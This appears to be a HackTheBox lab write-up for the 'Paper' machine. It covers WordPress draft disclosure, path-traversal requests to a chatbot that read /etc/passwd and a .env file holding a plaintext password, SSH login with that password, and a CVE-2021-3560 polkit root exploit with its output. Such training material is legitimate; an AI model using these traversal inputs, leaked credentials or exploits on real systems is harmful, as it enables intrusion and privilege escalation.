Hi everyone! Today’s write-up is on Paper, an easy Linux machine from HackTheBox. This machine requires us to enumerate the HTTP response header to discover the domain name, enumerate the WordPress version for a known vulnerability, and find a specific comment on a post before we know enough to exploit that vulnerability and read secret content in a draft. The draft reveals another subdomain hosting a chat system, along with a secret registration URL for creating an account on it. Once registered, we discover a chatbot with a vulnerability that lets us read arbitrary files on the system with Dwight’s privileges. The credentials found this way work for SSH and give us initial access. Finally, linpeas points us to CVE-2021-3560 for privilege escalation. Let’s get started!
Nmap enumeration
kali@kali~$ IP=10.10.11.143
kali@kali~$ sudo nmap -sC -sV -p- $IP
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-05 12:11 EST
Nmap scan report for 10.10.11.143
Host is up (0.044s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
Web enumeration (Port 80)

Response header
When checking the HTTP response header, I noticed something interesting: an X-Backend-Server header with the value “office.paper”, which looks like the domain name of the website.
kali@kali~$ curl -X HEAD -I http://$IP
HTTP/1.1 403 Forbidden
Date: Sun, 06 Mar 2022 01:42:08 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
ETag: "30c0b-5c5c7fdeec240"
Accept-Ranges: bytes
Content-Length: 199691
Content-Type: text/html; charset=UTF-8
As a result, we can add it into our /etc/hosts file.
kali@kali~$ sudo nano /etc/hosts
In /etc/hosts:
127.0.0.1 localhost
127.0.1.1 kali
10.10.11.143 office.paper
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Change in webpage
After adding the domain name, I browsed to http://office.paper and was immediately presented with a new page.

WordPress discovery and scanning
When looking at the main page’s source code via CTRL+U, I noticed “wp-includes” paths, which indicate the website is running WordPress.

Draft hints and vulnerability
When I read the post on “feeling alone”, I noticed an interesting comment.

Nick commented that there is secret content in the drafts.

Running wpscan against the website showed that the WordPress version in use is 5.2.3.
kali@kali~$ wpscan /usr/share/wordlists/rockyou.txt --url http://office.paper
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://office.paper/ [10.10.11.143]
[+] Started: Sat Mar  5 21:24:18 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
 |  - X-Powered-By: PHP/7.2.24
 |  - X-Backend-Server: office.paper
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] WordPress readme found: http://office.paper/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).
 | Found By: Rss Generator (Passive Detection)
 |  - http://office.paper/index.php/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>
 |  - http://office.paper/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>

[+] WordPress theme in use: construction-techup
 | Location: http://office.paper/wp-content/themes/construction-techup/
 | Last Updated: 2021-07-17T00:00:00.000Z
 | Readme: http://office.paper/wp-content/themes/construction-techup/readme.txt
 | [!] The version is out of date, the latest version is 1.4
 | Style URL: http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1
 | Style Name: Construction Techup
 | Description: Construction Techup is child theme of Techup a Free WordPress Theme useful for Business, corporate a...
 | Author: wptexture
 | Author URI: https://testerwp.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1, Match: 'Version: 1.1'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=========================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.
A quick Google search of the WordPress version turned up a vulnerability that allows unauthenticated users to read drafts on the website. You can take a look at an overview of the vulnerability here and a working PoC here.
Discovery of another subdomain page
Using the WordPress 5.2.3 vulnerability, I read the website’s draft by visiting http://office.paper/?static=1 in the browser. The draft reveals the subdomain http://chat.office.paper/ and also contains the URL for registering on the chat system.

Register to the new chat system
Once again, we will need to add chat.office.paper into our /etc/hosts file.
kali@kali~$ sudo nano /etc/hosts
In /etc/hosts:
127.0.0.1 localhost
127.0.1.1 kali
10.10.11.143 office.paper
10.10.11.143 chat.office.paper
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
We can now visit http://chat.office.paper/register/8qozr226AhkCHZdyY on our browser.

Register for a new account. You can use any username, email, and password.
Once you click on “Register a new account”, we will be brought to another page. Click on “Use this username”.

Finally, we will be directed to the dashboard.

recyclops bot arbitrary read
In the General chat channel we discover the recyclops chatbot, which will read file contents for us.

The General chat also shows how to ask the chatbot for files, and that we can direct message the bot.

To direct message the chatbot, click on recyclops’ name and view the full profile.

Arbitrary file disclosure
By passing “..” in the argument, we can read outside of the “sales” folder: the bot never checks that the requested path stays inside that directory.

Credentials discovered

In ../hubot/.env, I discovered a password, “Queenofblad3s!23”.

Reading /etc/passwd with the command “file ../../../etc/passwd” reveals the usernames that exist on the machine.

Initial access
SSH
Trying the discovered password against the discovered usernames, I was able to log in to Dwight’s account.
kali@kali~$ ssh dwight@$IP
dwight@10.10.11.143's password: Queenofblad3s!23
Activate the web console with: systemctl enable --now cockpit.socket

Last login: Tue Feb  1 09:14:33 2022 from 10.10.14.23
[dwight@paper ~]$
Obtaining user flag
[dwight@paper ~]$ ls
bot_restart.sh  hubot  sales  user.txt
[dwight@paper ~]$ cat user.txt
0e1*****************************
Privilege escalation
Linpeas
We first download linpeas and transfer it to the victim machine.
kali@kali~$ wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
kali@kali~$ scp linpeas.sh dwight@$IP:/home/dwight/linpeas.sh
dwight@10.10.11.143's password: Queenofblad3s!23
On the victim machine, through the SSH session, we make the script executable and run it. In its output we notice that the machine is flagged as vulnerable to CVE-2021-3560.
[dwight@paper ~]$ chmod +x ./linpeas.sh
[dwight@paper ~]$ ./linpeas.sh
...
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.29
Vulnerable to CVE-2021-3560
...
CVE-2021-3560 Polkit Exploitation
A quick Google search led me to this working exploit here. Since we already have an SSH session, we can simply copy and paste it into pevector.py using nano or any text editor of your choice. Once that is done, we run it with Python 3 and obtain a root shell.
[dwight@paper ~]$ python3 pevector.py
**************
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original exploit author: Kevin Backhouse
For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
**************
[+] Starting the Exploit
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
...
[+] User Created with the name of ahmed
[+] Timed out at: 0.006865908438818638
Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005
Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005
Error org.freedesktop.DBus.Error.UnknownMethod: No such interface 'org.freedesktop.Accounts.User' on object at path /org/freedesktop/Accounts/User1005
... (the same error line repeats many more times)
[+] Timed out at: 0.00740670140187632
[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

bash: cannot set terminal process group (132974): Inappropriate ioctl for device
bash: no job control in this shell
[root@paper dwight]# id
uid=0(root) gid=0(root) groups=0(root)
[root@paper dwight]#
Obtain the root flag
[root@paper dwight]# cat /root/root.txt
e3c*****************************
I hope this write-up has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂